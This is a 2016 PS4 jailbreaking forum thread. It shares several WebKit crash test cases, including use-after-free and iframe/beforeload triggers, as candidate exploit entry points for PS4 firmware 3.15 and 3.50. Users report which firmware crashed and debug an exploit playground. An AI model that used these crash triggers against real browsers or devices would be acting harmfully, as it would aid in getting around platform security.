Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter mcmrc1       Start date Apr 10, 2016 at 12:04 PM       150      
Status
Not open for further replies.
Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.
@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers :)
1. Entry point:
Code:
<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>
2. Entry point:
Code:
<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>
Also the the source code from the Webkit from Sony ;)
3. Entry Point:
Code:
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>
4. Entry Point:
Code:
<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>
PS4 3.15 Firmware Entry Point.png
 

Comments

There were 5 samples of codes to test, and only one gave good results on ps4 (2.55 & 3.15 FW) and Vita
Code:
<!DOCTYPE html>
<html lang="en">
<head>
   <meta charset="UTF-8">
   <title>ps4 test 1</title>
</head>
<body>
<h1>ps4 test #1 (Garbage) page loaded</h1>
<script>
function inituaf() {
  for(var i=0; i<100; i++) {
  for(var j=0; j<32; j++) {
  }
  }
  try { CollectGarbage(); } catch(err) {
  try { window.gc(); } catch(err) {
  for(var i=0; i<100; i++) {
  }
  }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
<object onbeforeload="eventhandler2()"><iframe>
</body>
</html>

It gives error messages "Memory Full".
For those who want to dig this bug:
https://bugs.chromium.org/p/chromium/issues/detail?id=265889
 
i get the same results on numbers 2 and 4. strange. on 3.15 here. hey does it seem to work better all in all on 3.50? guys? [USERGROUP=8]@Developer[/USERGROUP]

EDIT: @GritNGrind any luck getting more than a system crash? something tangible for exploitation maybe?

Yeah, no luck getting it to work on 3.50 I tried different things all night. :( I got it to at least crash the browser and come up with an error code by running some code to fill up the memory and then exiting out of the browser, but going right back in to run the code again. It takes about 6 or 7 times doing this and the PS4 starts to get really slow, and then the browser finally crashes out, screen goes black, and finally resets to the main XMB and gives error code.

I worked on CTURT's PS4 Playground trying to get that work as well, modifying it with no luck. I know the lines it stumbles on, but not sure how to fix it (someone smarter than me) :) Seems to be when it writes to the logAdd it stop executing after that. If I REM out them three the code will continue to run after that, but again stop at the next time it does a logAdd. Again, if you REM each logAdd the code goes all the way through, but of course at that point you don't get good results.
Code:
logAdd("0x" + executableHandle.toString(16)); // 0x52
logAdd("0x" + writableHandle.toString(16)); // 0x53
logAdd("Data address: 0x" + dataAddress.toString(16)); // 0x926300000
 
Status
Not open for further replies.
Back
Top